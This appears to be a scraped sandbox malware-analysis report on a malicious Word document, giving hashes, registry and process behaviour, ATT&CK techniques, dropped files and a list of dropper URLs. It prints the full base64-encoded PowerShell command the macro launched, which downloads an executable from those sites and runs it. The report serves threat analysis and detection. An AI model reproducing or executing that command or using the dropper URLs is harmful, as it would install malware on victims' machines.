6d3d32f94e8c49634c93ac96bf0b6ef4bb3dc49696aef545f990d19752a027e5

General

Target

ede01e38b308bd23c693339b34a81f38_JaffaCakes118.doc
Size

197KB
MD5

ede01e38b308bd23c693339b34a81f38
SHA1

97b1b3d1821a5d49baacbd56cf9511ca7c41be2f
SHA256

6d3d32f94e8c49634c93ac96bf0b6ef4bb3dc49696aef545f990d19752a027e5
SHA512

2082a7ab6d25eb7a8373c0ca70475f03e9e1093568ded48a983b6eee7f97823eb0e6302c15b41ae45a2ad45f9972ad8c47b69f3cda25d29c7ebfa394f2926354
SSDEEP

3072:It9ufstRUUKSns8T00JSHUgteMJ8qMD7gRycwR0PK2zkG:It9ufsfgIf0pLlwRAYG

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://fulfillmententertainment.com/cgi-bin/WrD/

exe.dropper

https://www.getwayimmigration.com/vqg1j3/1BwbZNN/

exe.dropper

http://vidadohomem.com/wp-content/O2ir3vx/

exe.dropper

http://analyticscosm.com/cgi-bin/PwlMy/

exe.dropper

http://www.angiathinh.com/wp-admin/KpNfK/

exe.dropper

http://twoparrot.com/wp-includes/s7aGv/

exe.dropper

http://ieee-acts.com/mainpage/vG/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3336	744	POwersheLL.exe	83

Blocklisted process makes network request 5 IoCs

flow	pid	Process
28	3336	POwersheLL.exe
33	3336	POwersheLL.exe
90	3336	POwersheLL.exe
106	3336	POwersheLL.exe
107	3336	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2144	WINWORD.EXE
2144	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3336	POwersheLL.exe
3336	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3336	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2144	WINWORD.EXE
2144	WINWORD.EXE
2144	WINWORD.EXE
2144	WINWORD.EXE
2144	WINWORD.EXE
2144	WINWORD.EXE
2144	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ede01e38b308bd23c693339b34a81f38_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2144

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABLAGIANwBoADcAeQAyAD0AKAAnAEsANQAnACsAKAAnAHUAaQBiADQAJwArACcAOAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAVQBTAGUAcgBQAHIAbwBmAEkATABlAFwAWQBnADkAawBfADkAdABcAG8AYQBkADcAMABkAFMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAEMAdQBSAGkAYABUAFkAYABwAFIATwBUAG8AYABjAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACcAcwAxACcAKwAoACcAMgAnACsAJwAsACAAdAAnACkAKwAoACcAbABzADEAMQAnACsAJwAsACAAdAAnACsAJwBsAHMAJwApACkAOwAkAEEAYwBlAHoAawA1ADIAIAA9ACAAKAAnAFgAYQAnACsAJwBnACcAKwAoACcAbgAnACsAJwBhADYAJwArACcAOQB5ADgAJwApACkAOwAkAEgAMgBkAGUAZQA5AHUAPQAoACgAJwBJAGkAJwArACcAMAAnACkAKwAoACcAdQAnACsAJwBiAGsAJwApACsAJwBxACcAKQA7ACQAUABwAHgANgAyAGgAYQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEQAVQBtACcAKwAnAFkAZwAnACkAKwAoACcAOQAnACsAJwBrAF8AJwApACsAJwA5ACcAKwAoACcAdABEACcAKwAnAFUAbQBPAGEAZAA3ADAAZAAnACsAJwBzACcAKQArACgAJwBEACcAKwAnAFUAbQAnACkAKQAuACIAUgBgAEUAUABMAGEAYwBlACIAKAAoACcARAAnACsAJwBVAG0AJwApACwAWwBzAHQAcgBJAG4AZwBdAFsAYwBoAEEAUgBdADkAMgApACkAKwAkAEEAYwBlAHoAawA1ADIAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABXAGYAbwBrAGoAMgBkAD0AKAAnAFoAJwArACcAMAAnACsAKAAnADgAZgBzAHUAJwArACcAZQAnACkAKQA7ACQATQBzAF8AcQB3AHQAcwA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAEUAQgBDAGwAaQBFAG4AVAA7ACQAUQBwADgAdgBrAGYAcwA9ACgAKAAnAGgAJwArACcAdAB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAGYAdQBsACcAKQArACgAJwBmAGkAJwArACcAbABsACcAKQArACcAbQAnACsAKAAnAGUAbgB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAnAGUAcgAnACsAJwB0AGEAaQBuAG0AZQBuAHQALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAJwAvACcAKwAoACcAYwBnAGkALQBiACcAKwAnAGkAbgAnACkAKwAoACcALwAnACsAJwBXAHIARAAvACcAKwAnACoAJwApACsAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdwB3AHcALgAnACkAKwAoACcAZwBlAHQAdwBhACcAKwAnAHkAaQBtACcAKwAnAG0AJwApACsAJwBpAGcAJwArACgAJwByAGEAdABpACcAKwAnAG8AbgAuAGMAJwArACcAbwBtACcAKwAnAC8AdgBxAGcAJwArACcAMQAnACsAJwBqADMALwAnACkAKwAnADEAJwArACgAJwBCAHcAJwArACcAYgBaAE4ATgAvACoAJwArACcAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAHYAaQBkAGEAZABvACcAKwAnAGgAbwBtAGUAbQAuAGMAbwAnACsAJwBtAC8AJwApACsAJwB3AHAAJwArACcALQAnACsAJwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAoACcALwAnACsAJwBPADIAaQByADMAJwApACsAKAAnAHYAeAAvACcAKwAnACoAaAAnACsAJwB0AHQAJwApACsAJwBwADoAJwArACcALwAvACcAKwAnAGEAJwArACgAJwBuACcAKwAnAGEAbAAnACkAKwAnAHkAJwArACgAJwB0AGkAJwArACcAYwAnACkAKwAnAHMAJwArACgAJwBjAG8AcwBtACcAKwAnAC4AJwArACcAYwAnACsAJwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AJwApACsAKAAnAFAAdwAnACsAJwBsACcAKQArACgAJwBNAHkAJwArACcALwAqAGgAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcALwAnACsAJwAvAHcAdwB3AC4AYQAnACkAKwAnAG4AZwAnACsAKAAnAGkAYQB0ACcAKwAnAGgAJwArACcAaQBuACcAKQArACgAJwBoAC4AJwArACcAYwBvACcAKwAnAG0ALwB3ACcAKQArACcAcAAtACcAKwAoACcAYQBkACcAKwAnAG0AaQBuAC8AJwArACcASwAnACkAKwAnAHAATgAnACsAJwBmAEsAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKQArACcALwAnACsAKAAnAC8AdAAnACsAJwB3ACcAKwAnAG8AcABhAHIAcgAnACsAJwBvAHQALgBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACgAJwB3ACcAKwAnAHAALQAnACkAKwAoACcAaQBuACcAKwAnAGMAbAB1AGQAZQAnACsAJwBzAC8AJwApACsAJwBzADcAJwArACcAYQBHACcAKwAnAHYAJwArACgAJwAvACcAKwAnACoAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwBpAGUAZQBlACcAKwAnAC0AYQBjAHQAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAG0AYQAnACsAJwBpACcAKQArACgAJwBuAHAAJwArACcAYQAnACkAKwAoACcAZwBlAC8AdgAnACsAJwBHAC8AJwApACkALgAiAFMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASABzAG4AXwBuAGwAMQA9ACgAJwBSACcAKwAnAHEAcgAnACsAKAAnAHkANAAnACsAJwBuADAAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABQAHkAOQBmAHUAMABlACAAaQBuACAAJABRAHAAOAB2AGsAZgBzACkAewB0AHIAeQB7ACQATQBzAF8AcQB3AHQAcwAuACIAZABgAG8AdwBuAGAATABvAEEAZABGAEkAbABFACIAKAAkAFAAeQA5AGYAdQAwAGUALAAgACQAUABwAHgANgAyAGgAYQApADsAJABYAHUAXwAzAGoAdwBlAD0AKAAoACcAUQA0ACcAKwAnAGYAZgAnACsAJwBhAHAAJwApACsAJwBlACcAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABQAHAAeAA2ADIAaABhACkALgAiAEwAYABlAG4ARwB0AGgAIgAgAC0AZwBlACAAMwA1ADIAMAA0ACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAFAAcAB4ADYAMgBoAGEAKQA7ACQAVABqAHQAOQBxAGUAdQA9ACgAKAAnAFQAJwArACcAeAA0AGoAcAAnACkAKwAnAHMAdwAnACkAOwBiAHIAZQBhAGsAOwAkAEEAaQA5AHYAbQAwAHoAPQAoACcAVgAnACsAKAAnAG0AdQAnACsAJwBmAHUAeABqACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHQAYwBlAHEAMAByAD0AKAAoACcASwBtACcAKwAnAHQAJwApACsAKAAnAF8AbAAnACsAJwBrACcAKQArACcAaQAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDBE37.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwzwr5yt.ivy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
686d1e7a2d5c660594471f29ea3f5275

SHA1
a6ae37fa755085f5229b4499601e07dd45cf18f8

SHA256
e235bf651d9f3d782d7152e67cdd6529eebb52f6f24c4cae743e1d80ef4f42f0

SHA512
e7b491d07a108e3f13c12472d3581b2c3788939458d61eadd1cb7d9993b5f8348f0231e712782fe8389889e70cbb0750b47fbd3ff77f0e6345d6ac1098cd7801

Download Submit
C:\Users\Admin\Yg9k_9t\oad70dS\Xagna69y8.exe

Filesize
44KB

MD5
963de8d09a8e20cca74b5b4705a353fb

SHA1
80f3e66bdc6368a43f1a345d802872cbb1c58174

SHA256
d199d63a4e7723e311bf934dae7ac58a87d80d756b7ace2e6a3b562705600dcb

SHA512
3882fee3883c3c45326624d08244e76777f0a5b15274147a1a183c3bb7e238dbb7060060cde30b502444eb1efbb90a4aad359d7e034b8ad923e5203be3a9e363

Download Submit
memory/2144-97-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-4-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-7-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-5-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-10-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-9-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-11-0x00007FF9315C0000-0x00007FF9315D0000-memory.dmp

Filesize
64KB

Download
memory/2144-8-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-12-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-13-0x00007FF9315C0000-0x00007FF9315D0000-memory.dmp

Filesize
64KB

Download
memory/2144-20-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-25-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-609-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-607-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-2-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-6-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-93-0x00007FF973BED000-0x00007FF973BEE000-memory.dmp

Filesize
4KB

Download
memory/2144-94-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-95-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-96-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-0-0x00007FF973BED000-0x00007FF973BEE000-memory.dmp

Filesize
4KB

Download
memory/2144-3-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-103-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/2144-608-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-1-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-605-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/2144-606-0x00007FF933BD0000-0x00007FF933BE0000-memory.dmp

Filesize
64KB

Download
memory/3336-584-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/3336-104-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download
memory/3336-66-0x000001B43BB10000-0x000001B43BB32000-memory.dmp

Filesize
136KB

Download
memory/3336-65-0x00007FF973B50000-0x00007FF973D45000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads